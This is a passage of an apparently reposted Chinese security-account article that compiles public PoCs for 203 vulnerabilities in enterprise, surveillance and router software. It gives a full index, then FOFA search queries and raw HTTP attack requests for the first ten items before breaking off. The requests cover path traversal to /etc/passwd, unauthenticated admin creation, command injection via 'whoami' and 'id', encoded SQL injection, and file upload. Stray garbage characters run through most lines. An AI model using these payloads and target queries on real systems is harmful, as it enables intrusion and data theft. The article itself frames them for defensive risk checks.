互联网公开漏洞整理202309-202406: O7 ]4 a) S* B l f
道一安全 2024-06-05 07:41 北京
/ J; t$ j0 n7 |1 J% Z7 w以下文章来源于网络安全新视界 ,作者网络安全新视界
3 ?! o; Z" i& K& j8 y& K. ]- q9 s I" Z; T) ]" t
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
$ }- U4 w% D$ b$ w4 _+ F3 w" ?+ b% H* O& e
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。) Q; e& {: a" o2 _
0 A3 W7 M7 f( _: v. R安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。4 m6 H. ~' T- z
5 f! r# F2 X2 ]; l' {+ e文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
- H6 H6 ~3 @# M; a6 E0 n4 S* c3 A1 e: a9 i
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。6 U/ T: ]) t# F( x
: X* u% i5 v/ p! n
( {( W* n1 R7 z3 s4 e3 W- G声明
. E8 F9 P7 T' u; {/ f. a$ y" b
) Y- @9 c8 p5 O- h为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。! B* E/ M+ r2 @; x5 m+ l
8 `0 W7 O. J/ n4 z% K) t q
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。# M7 x+ P* c2 W* F& H& M
[0 {, S" x& ]+ w* \- r8 N0 K; r5 ]2 c2 O/ ^* k7 T# T9 ?; n
1 d! X) H9 v) X% y" m6 [& ~+ m8 R
目录 I, F& T# ]0 U, n2 f; e! j
& k* r5 }* O1 Z01& r- _9 j8 Q3 m& L
" X& P0 H1 s, j% M' W: s% T1 t% x5 T1. StarRocks MPP数据库未授权访问' j. o& `4 b. R; W
2. Casdoor系统static任意文件读取
' U4 B: ]/ k- q( d3. EasyCVR智能边缘网关 userlist 信息泄漏
1 n, ~9 w& ~# I7 R$ Z) |4. EasyCVR视频管理平台存在任意用户添加
@0 y6 |' V: q5 H5. NUUO NVR 视频存储管理设备远程命令执行9 q$ T4 J7 m% A ^$ L
6. 深信服 NGAF 任意文件读取# E( _8 A4 b+ X* K0 B: ]$ I7 k
7. 鸿运主动安全监控云平台任意文件下载
* ^& ?, B2 t4 i# O8. 斐讯 Phicomm 路由器RCE
& V- l4 C8 I5 }/ x! n5 I; g! `5 g9. 稻壳CMS keyword 未授权SQL注入4 k g6 e W+ V
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
, i! e& U0 i/ J$ X11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
9 w! i6 _+ [, Q5 O D0 s12. Jorani < 1.0.2 远程命令执行, X( S3 f! m0 o, b
13. 红帆iOffice ioFileDown任意文件读取7 p" m$ _9 W9 Y! D/ X j# y) r: K
14. 华夏ERP(jshERP)敏感信息泄露! ~) R+ F6 S. C' @0 X3 O: e
15. 华夏ERP getAllList信息泄露( F7 ^. h/ `( b9 y! ^& _
16. 红帆HFOffice医微云SQL注入% D' x" y4 \. U$ y# A
17. 大华 DSS itcBulletin SQL 注入! I' `* L {" h' c$ z: q- ]. l
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露, K9 q8 y- Y4 j! J$ x+ h F
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
0 \4 k( M% o( Y" D! b20. 大华ICC智能物联综合管理平台任意文件读取
$ D4 N8 L( D, m9 v21. 大华ICC智能物联综合管理平台random远程代码执行
; l: {1 m0 d. n4 [( j22. 大华ICC智能物联综合管理平台 log4j远程代码执行, s+ A$ b# h* U9 g+ a; L+ C
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行2 O% i7 b: Y9 k6 R
24. 用友NC 6.5 accept.jsp任意文件上传: @' @, V2 m' c+ E- t+ {- O. Z
25. 用友NC registerServlet JNDI 远程代码执行
( s/ D8 x, ]3 z3 A, c. _% ^26. 用友NC linkVoucher SQL注入
9 y% G# I) e' [6 L3 s( s27. 用友 NC showcontent SQL注入+ F) x7 _) O! f
28. 用友NC grouptemplet 任意文件上传3 r% ^1 R# H$ d: n
29. 用友NC down/bill SQL注入$ H' v6 X, K" G* X; m
30. 用友NC importPml SQL注入
' `) m' F* y) s+ P" I- x5 F9 h31. 用友NC runStateServlet SQL注入. S" @ p; q. e* E( x6 {) r' h
32. 用友NC complainbilldetail SQL注入' N4 f* k- b- d: [0 I' i% g
33. 用友NC downTax/download SQL注入) g* S# L2 q4 d+ {1 K/ L$ o, q
34. 用友NC warningDetailInfo接口SQL注入' X* L. u+ S+ k3 l
35. 用友NC-Cloud importhttpscer任意文件上传 g2 H+ X, r: P! Q3 Q( M* `
36. 用友NC-Cloud soapFormat XXE" }+ b7 @. x+ I0 l2 v
37. 用友NC-Cloud IUpdateService XXE
) v1 @# y& `1 d$ }1 C; O38. 用友U8 Cloud smartweb2.RPC.d XXE
/ z3 O+ @2 b% \5 @! U4 v39. 用友U8 Cloud RegisterServlet SQL注入; U7 k: r1 u# \
40. 用友U8-Cloud XChangeServlet XXE5 \+ o, j, a8 O) N* G. n
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
1 A+ ^/ j' Y/ E- P; O! o42. 用友GRP-U8 SmartUpload01 文件上传
% z0 `& ^2 [5 d/ ]43. 用友GRP-U8 userInfoWeb SQL注入致RCE
5 t7 n/ }6 b( z8 ? C$ a @44. 用友GRP-U8 bx_dj_check.jsp SQL注入
. T5 p: D" Y2 {0 T* N& u- e45. 用友GRP-U8 ufgovbank XXE+ j! V) M! \, T5 Y( a6 {
46. 用友GRP-U8 sqcxIndex.jsp SQL注入# w, A1 | H" ~% h. g7 r
47. 用友GRP A++Cloud 政府财务云 任意文件读取
! Y- p' i! o. |5 ^' Y/ U48. 用友U8 CRM swfupload 任意文件上传7 U, M, l* P- ]9 B0 w4 M1 |, d5 K: Q
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
5 n) U) O: t* T& A& r! u7 E, G- j50. QDocs Smart School 6.4.1 filterRecords SQL注入
& ?) c8 l7 w0 d2 s51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入" o% n' D& G9 s0 f4 Q6 R: S
52. 泛微E-Office json_common.php sql注入, s( R$ S4 I0 Y8 q: W4 I1 e
53. 迪普 DPTech VPN Service 任意文件上传" N$ S5 T( t/ b1 o0 M
54. 畅捷通T+ getstorewarehousebystore 远程代码执行( _* m3 X" h: m% {/ ]1 \. @1 i
55. 畅捷通T+ getdecallusers信息泄露
" F6 M7 s& B/ |5 a& C! k4 s56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
5 p- b9 N, U: m9 x4 s" v6 p57. 畅捷通T+ keyEdit.aspx SQL注入9 Y. N7 h6 i/ F, K+ q5 o x
58. 畅捷通T+ KeyInfoList.aspx sql注入
5 b1 R, w/ {) w0 K1 D( B5 ~5 y C f59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行$ P, Y: U$ j; t. n# Y% d
60. 百卓Smart管理平台 importexport.php SQL注入
+ g) s: Z. u4 M9 T8 T, ]61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
" w V; n7 r4 M5 ^3 f+ Q! L! Q62. IP-guard WebServer 远程命令执行
1 ~7 j( m |. j63. IP-guard WebServer任意文件读取
! B7 y* Q) Y% ^64. 捷诚管理信息系统CWSFinanceCommon SQL注入! @5 o& j, x# P- k5 U; n' @
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过& r7 ]+ N2 B' {5 `
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
/ [/ W% I5 V3 i, y# V; |67. 万户ezOFFICE wpsservlet任意文件上传
4 Q2 a7 o, n% R8 f4 j1 w$ o68. 万户ezOFFICE wf_printnum.jsp SQL注入
6 a7 h+ X1 W$ g4 ?" w' u/ W4 R69. 万户 ezOFFICE contract_gd.jsp SQL注入
" o; J4 u0 k" }8 w70. 万户ezEIP success 命令执行, B; p% c- }- n2 {
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
; L; F. p, U/ B* Y2 e72. 致远OA getAjaxDataServlet XXE
9 U; c* i7 s, q* ^73. GeoServer wms远程代码执行
4 j L, g o v0 ?( ^" Y [- p s74. 致远M3-server 6_1sp1 反序列化RCE7 |- h+ \" j- [. R9 m6 q$ x
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
e/ V; y9 E/ ]1 z8 D% N9 J76. 新开普掌上校园服务管理平台service.action远程命令执行& k0 r0 {* `# |2 p/ L2 I
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
: e2 D4 |# r0 x; }9 f78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传8 ~0 E& x, t) ]" u
79. BYTEVALUE 百为流控路由器远程命令执行
3 K& t6 x9 w+ W+ P80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传3 U) e0 Q$ c$ E+ p- R+ f6 O
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
& A8 S- {! F, Z+ A/ m82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
* ]6 S0 \2 Q/ K0 e- r' I83. JeecgBoot testConnection 远程命令执行5 w d+ l4 G% c2 `7 {( ^
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
. b8 n( ^' \( m' S% ~7 l85. SysAid On-premise< 23.3.36远程代码执行" y2 m0 f% w" Y4 ?# v
86. 日本tosei自助洗衣机RCE( {. |9 J% _/ A/ {1 L A% I2 {
87. 安恒明御安全网关aaa_local_web_preview文件上传
& y3 n4 `' z2 ^7 J88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行 ~9 S" E* p9 ^% k# [6 x; T) _9 B
89. 致远互联FE协作办公平台editflow_manager存在sql注入3 H; _, q0 Q) ~* R3 T/ i1 v, l e
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
0 X) U. U+ {2 t: R3 {; ] x91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取- q8 }" f9 m. @6 R2 n3 S
92. 海康威视运行管理中心session命令执行
6 U8 b2 a: A2 {93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传& n/ T/ [% _: W
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传: ` B6 N+ X, R# C
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行/ Q/ j. e. X, g# W% G' b* x" U4 U
96. Apache OFBiz 18.12.11 groovy 远程代码执行# t: @& f* J+ _/ h6 P" J+ j
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行( C7 f" W$ |. P8 v0 Z
98. SpiderFlow爬虫平台远程命令执行7 z; M. B8 [/ {
99. Ncast盈可视高清智能录播系统busiFacade RCE
+ t h- g0 W1 y& l' |100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传, ]% V2 y4 A3 T! h7 t8 \
101. ivanti policy secure-22.6命令注入
6 X/ N2 S& j9 @8 N0 f102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行4 W$ R4 [! b9 V
103. Ivanti Pulse Connect Secure VPN XXE" r4 ^9 |, G1 T! U. o* W# `- E
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
0 J5 z' n+ A* A I1 }9 l105. SpringBlade v3.2.0 export-user SQL 注入
4 Y) g: q# x6 m; E; n- [+ o! V. v- Z106. SpringBlade dict-biz/list SQL 注入
, I4 E# c8 q U6 |$ W' M2 p107. SpringBlade tenant/list SQL 注入
$ I+ o! U4 e) ]108. D-Tale 3.9.0 SSRF
4 Z4 b& H( o4 s7 n; a8 I: [109. Jenkins CLI 任意文件读取) d3 e* [3 C6 _- Z* c
110. Goanywhere MFT 未授权创建管理员3 _# [# n% j5 J l; m
111. WordPress Plugin HTML5 Video Player SQL注入
: l' u+ W# \ \2 Q& ~112. WordPress Plugin NotificationX SQL 注入
: J# c8 K, x2 s- @113. WordPress Automatic 插件任意文件下载和SSRF! `/ x- s' W9 q3 ^/ `8 ^
114. WordPress MasterStudy LMS插件 SQL注入
( j& d% W) A+ m; _( I115. WordPress Bricks Builder <= 1.9.6 RCE* w. Y0 ?. y- B7 Y9 |! g
116. wordpress js-support-ticket文件上传 R' D; N4 G _/ B
117. WordPress LayerSlider插件SQL注入
9 d2 Q! E* {# d2 X" `7 V' b; p118. 北京百绰智能S210管理平台uploadfile.php任意文件上传9 j; }4 B: N& h% g: U$ Z; M3 R3 a
119. 北京百绰智能S20后台sysmanageajax.php sql注入! t& l/ J; Y' k: L) a8 G7 U
120. 北京百绰智能S40管理平台导入web.php任意文件上传. H( n* g4 W2 I8 I! A. ?) A
121. 北京百绰智能S42管理平台userattestation.php任意文件上传; B' P. N4 c' P8 j! A2 [" ?9 @
122. 北京百绰智能s200管理平台/importexport.php sql注入
- O) V+ U' y6 l+ p( @123. Atlassian Confluence 模板注入代码执行
0 L" ^ l: g; f, u- ?$ [124. 湖南建研工程质量检测系统任意文件上传- X) h. D6 p/ g) h: d
125. ConnectWise ScreenConnect身份验证绕过) I" N4 `3 t8 L& [
126. Aiohttp 路径遍历8 R# I# u) E6 C% Y! M4 O
127. 广联达Linkworks DataExchange.ashx XXE6 d3 ^3 W+ S# J9 U2 \9 @
128. Adobe ColdFusion 反序列化: |' q1 W$ K& }$ R2 ]0 P7 |* R
129. Adobe ColdFusion 任意文件读取
- W) g9 K0 r) E( _5 e- @130. Laykefu客服系统任意文件上传
$ r" A& T$ M3 Q9 i, K1 F" G. Q131. Mini-Tmall <=20231017 SQL注入
& W) W* z" i" V+ R132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过* p1 e" T8 R7 W
133. H5 云商城 file.php 文件上传2 e p3 g: U7 [, i# k
134. 网康NS-ASG应用安全网关index.php sql注入. T* f8 V% |6 K% Z
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
0 X9 F7 i* k0 Q8 `& [136. NextChat cors SSRF6 @! h( N1 f- w; q& t( C% `
137. 福建科立迅通信指挥调度平台down_file.php sql注入4 i [# J e& M `9 V& E
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入! y+ C' x8 J1 Z, `- l( [
139. 福建科立讯通信指挥调度平台editemedia.php sql注入9 x: q$ a9 G: c4 Q$ J6 H) V4 C
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入4 e5 T8 \# G' e* ?. x5 _& T3 x
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
3 J( G. U0 U' ?2 k E, @7 [) |' Y142. CMSV6车辆监控平台系统中存在弱密码6 s i5 d! a5 B' m
143. Netis WF2780 v2.1.40144 远程命令执行& F6 H# |: x& J* e0 H( A
144. D-Link nas_sharing.cgi 命令注入0 P7 g8 o9 |; k+ w. A1 Y% X
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入+ V2 r9 j+ n/ q- r; Z" Z
146. MajorDoMo thumb.php 未授权远程代码执行2 c2 r: L" C2 P/ f+ n
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
$ `3 d1 w S6 E/ g* I+ K8 `148. CrushFTP 认证绕过模板注入
- p" [) T7 F- w149. AJ-Report开源数据大屏存在远程命令执行
% d7 \, I: ~5 m1 ?0 ^0 u150. AJ-Report 1.4.0 认证绕过与远程代码执行! l- x/ Z8 \ L# W4 o q
151. AJ-Report 1.4.1 pageList sql注入
# g2 r* ?4 p' x- X& ^152. Progress Kemp LoadMaster 远程命令执行
' f8 l/ M% x2 k8 c) u6 Q153. gradio任意文件读取3 S3 I/ o f/ z6 e+ M
154. 天维尔消防救援作战调度平台 SQL注入# Y, z1 N! W* y; J' h
155. 六零导航页 file.php 任意文件上传
, e- _' s& L. m9 {156. TBK DVR-4104/DVR-4216 操作系统命令注入
7 D i1 E1 z. `0 W% a, v V! T; E157. 美特CRM upload.jsp 任意文件上传
' S. y( x- j3 w158. Mura-CMS-processAsyncObject存在SQL注入
+ j0 Y, Q8 `9 m) X8 s. `8 }159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传; j4 d& ]: z% C6 E* }0 T
160. Sonatype Nexus Repository 3目录遍历与文件读取
1 `* ]8 G; [8 x; Z$ D161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传$ C( K- j# s4 M% J9 _
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传6 n ]2 Y# b9 E- K8 j4 z
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传+ D/ S! Q6 Y0 B
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
. Z5 Z2 D& L. T5 D) ?165. OrangeHRM 3.3.3 SQL 注入' C% o! G1 g; |9 {9 I: w
166. 中成科信票务管理平台SeatMapHandler SQL注入
( s' p9 }- U" z& c: ?0 ?167. 精益价值管理系统 DownLoad.aspx任意文件读取
! j; A/ |* J) T8 f) |168. 宏景EHR OutputCode 任意文件读取+ h, ?# Q9 [ {
169. 宏景EHR downlawbase SQL注入$ X7 y8 y# J: P2 [! ]+ w
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
/ E* \$ p% i& D% X S( O171. 通天星CMSV6车载定位监控平台 SQL注入
" K; \! Z8 l/ G+ Y _1 Y. r8 ?( G172. DT-高清车牌识别摄像机任意文件读取" v. u# A5 S5 J3 i4 K" T
173. Check Point 安全网关任意文件读取
) O5 T# X# K) Z% v8 y4 I174. 金和OA C6 FileDownLoad.aspx 任意文件读取
; T" U {; {* M- d- `175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
W4 J _! i% m1 @176. 电信网关配置管理系统 rewrite.php 文件上传
7 I3 w* \5 ~2 p, ~: D) e177. H3C路由器敏感信息泄露( }: U& H4 ?9 X. i' {- ]' F+ a
178. H3C校园网自助服务系统-flexfileupload-任意文件上传+ }9 ?& j- o6 H+ B; w* v w
179. 建文工程管理系统存在任意文件读取
, R. ]- F+ Q F4 k180. 帮管客 CRM jiliyu SQL注入
2 i! p+ U6 d6 t9 _1 O181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
* Q( a, m& C0 {4 |) h* e( y+ C182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
o+ {( Q4 l! Z" {. t, y- m183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入. B; V- i$ X: u, U' X; y6 |# Q0 h
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加) m. Z! N: @# Z& }' }) R
185. 瑞友天翼应用虚拟化系统SQL注入2 N0 a4 L( V0 q8 k
186. F-logic DataCube3 SQL注入7 t# n0 p' D' j+ s% ^/ m. W) t: Z
187. Mura CMS processAsyncObject SQL注入5 U3 w9 I% Q' r9 i
188. 叁体-佳会视频会议 attachment 任意文件读取/ B2 `! T5 T) w) |7 G
189. 蓝网科技临床浏览系统 deleteStudy SQL注入& H" T7 _! p+ N1 B8 y
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
7 E1 [0 N: R$ o191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入6 U3 `8 p Z$ }+ f5 Y& ?" u
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
$ |& W0 u) R: l193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
6 l+ _, L0 B7 d0 I( t194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传1 R& \' b4 o; {5 n
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
! b1 e* _; b p' J2 |- v( |196. 河南省风速科技统一认证平台密码重置, s. y# u5 p2 m0 o8 Y m) D
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
1 B+ _( o8 N: b4 r198. 阿里云盘 WebDAV 命令注入
4 {* T7 m2 ~' [& b D; P2 k199. cockpit系统assetsmanager_upload接口 文件上传5 z/ \8 }/ ~* w! R/ u" O7 m+ q$ z
200. SeaCMS海洋影视管理系统dmku SQL注入
; v- h, I- n4 U1 k201. 方正全媒体新闻采编系统 binary SQL注入 I8 B* p- U1 i$ h- W$ u* |* l
202. 微擎系统 AccountEdit任意文件上传
$ I+ E7 N3 \; ?0 f7 {; H6 z- C3 K203. 红海云EHR PtFjk 文件上传
; D. F- D) R' I) d) p) h* n1 H3 N# {, u4 Z) {1 y" X& F
POC列表
$ l% [& b: T- j( _/ K
" O) G& G0 Y8 L. ?" s( M( H( K02
7 T0 r, R5 r f; p5 l- q: \3 q0 L/ a/ i* C0 v
1. StarRocks MPP数据库未授权访问
* j2 H4 U) @ H# o5 TFOFA :title="StarRocks"
: M( n8 R& i* @7 a0 _+ \; eGET /mem_tracker HTTP/1.1
% g5 ^4 H8 C- \2 x- @) b# yHost: URL
) t3 _# @0 B6 J, b/ U8 @5 L
+ }- h' U5 b; j0 N; p. `: A w! T3 ^ y: u# D J7 x
2. Casdoor系统static任意文件读取* ^4 ?0 V$ E, o
FOFA :title="Casdoor"
. d5 q9 O4 S/ nGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
& \/ J- j; a. W$ f, q$ z* bHost: xx.xx.xx.xx:9999
( g6 W" C, d$ ]8 {; ?/ y1 R1 eUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36; H2 U7 h3 _2 I$ M2 h
Connection: close: ~7 p( n6 J- v, i- d5 T
Accept: */*
/ |7 g% g# p5 r6 qAccept-Language: en/ ~* b2 _1 g+ k" [1 a* \3 P
Accept-Encoding: gzip3 C2 @! _* _( R* ~1 G C8 ~
& y' l) K. [- ^. Y! m8 Q0 E
/ E! O5 p) e8 ?
3. EasyCVR智能边缘网关 userlist 信息泄漏/ W8 b4 ?7 |- l) C- i3 W- Y
FOFA :title="EasyCVR"
/ p# v3 j/ v/ N3 @4 U' l; ^GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1, ?) e6 @: n( `. j0 Q
Host: xx.xx.xx.xx
4 p, A" q% A; {- z' E9 B+ X+ v
9 H2 p* e' g* L! @$ h5 T# P
1 B( J1 K( D) ^4 P4. EasyCVR视频管理平台存在任意用户添加
7 n1 e, r h' T/ u0 F8 c8 D7 S, VFOFA :title="EasyCVR"
) ?1 J: x$ u; H7 U( q, W
' E8 N4 _$ F1 b: k" {password更改为自己的密码md5
; m7 r9 Z) ?4 l. F# bPOST /api/v1/adduser HTTP/1.1
: `2 ?# z* c' E! ?* _Host: your-ip
1 _4 |. Z/ ^: S# h. D* t. o1 `3 SContent-Type: application/x-www-form-urlencoded; charset=UTF-8
' F+ y) c/ d( ^9 s1 @! h% ?" r9 D: [1 C/ O/ R5 n/ A5 }
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=19 U' O2 u( }% S# b7 ?
0 d, ~: t& ]: B b
1 R4 z* `" f8 b' t% a
5. NUUO NVR 视频存储管理设备远程命令执行$ |! M# Q! r9 f x% k0 D
FOFA:title="Network Video Recorder Login": s: a0 W& t5 I$ x% e2 t8 l
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.13 h5 p5 l5 N* k1 H7 a' L3 s
Host: xx.xx.xx.xx
. W: ]. f* O- K9 p3 y Q( n' g& ]/ i% y$ ~2 Y$ T% d
9 k9 X8 r; @, R% r& T! H: t4 I4 M
6. 深信服 NGAF 任意文件读取
& v7 I' Y) @+ m! rFOFA:title="SANGFOR | NGAF"
- ?; G7 F' c. R. DGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
& N; I: t5 |% j# q( j3 Y d- fHost:
$ L* ?) u2 v: Q* N! `% F; X, a9 P4 c4 N$ z% K8 z
& H0 M, K. Y3 z
7. 鸿运主动安全监控云平台任意文件下载
- X+ g' ]4 A) Y6 `! C( _! UFOFA:body="./open/webApi.html"3 v. T" S" @ \# S6 s( ]: a$ m/ }2 s
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
8 @8 J; V. L$ {+ z7 ^# i. rHost:
. G- }3 [0 R0 o* u) L2 ~7 z
5 z) D8 U, F5 |7 v5 C7 f
- g' T3 D+ c/ X \7 y' J8. 斐讯 Phicomm 路由器RCE6 p: W e1 [ G7 W \
FOFA:icon_hash="-1344736688". O' M% f; K. D Z' D
默认账号admin登录后台后,执行操作
) G' M7 G% u- C1 DPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
# D! x2 a% h8 J9 [3 tHost: x.x.x.x
4 ~( Q" x D+ K3 Y; }% J5 \' X. [Cookie: sysauth=第一步登录获取的cookie- F9 \8 T2 h5 G
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz9 H% ]7 Y6 t: W& @9 ^) U2 u
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36/ X3 C8 I8 O7 @- f) K* l
* T& {2 @* }6 n* o1 i; P p& }8 {------WebKitFormBoundaryxbgjoytz4 E7 q9 W1 a" }$ T! U
Content-Disposition: form-data; name="wifiRebootEnablestatus"
, r4 o; f" d2 _6 x
9 A: ~5 k3 d6 _: W/ V* [' Y7 t%s& f0 ]9 u5 T$ R% c' n2 `$ a
------WebKitFormBoundaryxbgjoytz
2 `0 I2 ?/ D+ ?Content-Disposition: form-data; name="wifiRebootrange"* H+ w% @/ D8 x" @" [3 Q
P3 b. i# l6 A
12:00; id;2 U5 C& s6 m& K" {+ G
------WebKitFormBoundaryxbgjoytz
+ h5 k3 U2 c. C) [& u7 b. dContent-Disposition: form-data; name="wifiRebootendrange"% q; d$ w6 c* b) h2 o) ]
6 n* y2 v: y0 \& O/ ]( @
%s:( _& g4 ^ m: h7 O
------WebKitFormBoundaryxbgjoytz
6 v. n$ F3 V1 jContent-Disposition: form-data; name="cururl2"
; W- b$ k& D% `( }: k0 m1 S
0 q' i; R3 t0 p4 S
9 V+ J' `2 ~1 D4 n$ w6 j( k------WebKitFormBoundaryxbgjoytz--
3 ]+ g# a' o- Y1 t$ @5 k& O$ k& r9 @$ D0 H- {
% h$ h! P, q0 F6 \4 j
9. 稻壳CMS keyword 未授权SQL注入- }" N; X6 D$ o2 N
FOFA:app="Doccms"
' i# [2 s9 ?) a6 P$ z4 t5 `GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
$ R8 P& H3 r6 d. s) Z2 w# b* }Host: x.x.x.x
' Q, L) O: k! d1 a
" X6 E$ l; E3 n
/ A) e7 E$ Q1 L8 z9 D' c; A, Z+ ?payload为下列语句的二次Url编码
; q9 V# M' \/ k8 b `4 c3 v2 \ n: v2 l- X
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
. K2 ]* E! ]2 ~; f3 \. }# L; T: E$ h; C! b. O- V
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传: o$ V; j7 s; M: g
FOFA:icon_hash="953405444"3 T- C9 l9 @2 o4 w
# g8 ~* s+ k& {2 g: n: B5 S, b& h8 M文件上传后响应中包含上传文件的路径0 e6 f) m4 J+ N) U: O8 @# W+ b
POST /eis/service/api.aspx?action=saveImg HTTP/1.14 S2 }% B1 ~% J2 [2 Z: q
Host: x.x.x.x:xx- f, j, D+ A* C! @) y$ }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.366 y0 i1 c g( N$ a$ u: }$ Y" s* c
Content-Length: 197
) K! J) Y( }6 D8 N7 x8 x) F# SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.92 ]! h E7 t: W- s6 H$ l C
Accept-Encoding: gzip, deflate3 h$ r8 b' X7 F" f- A
Accept-Language: zh-CN,zh;q=0.9! g6 I) B3 \5 m2 x$ Q" G: e. L# m
Connection: close
6 W0 H8 W, r# Z" d {Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu9 b3 k% \3 }. j3 t& V, M, u
. E; w7 [3 C; ?------WebKitFormBoundaryxdgaqmqu
* D3 r/ j7 n, D, d) R/ b0 O: AContent-Disposition: form-data; name="file"filename="icfitnya.txt"
& x- z8 F% S6 c% Q9 MContent-Type: text/html* @% `) w7 S c2 m8 f! D F
3 h. o! w9 r3 a" o4 m, ~6 hjmnqjfdsupxgfidopeixbgsxbf
' v' O4 b0 U6 w8 _, {3 F------WebKitFormBoundaryxdgaqmqu--) L* s3 e7 C8 m" Z6 _
8 W) X% W* G0 h2 O. L* U A# W5 a9 d7 m# ]1 w
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
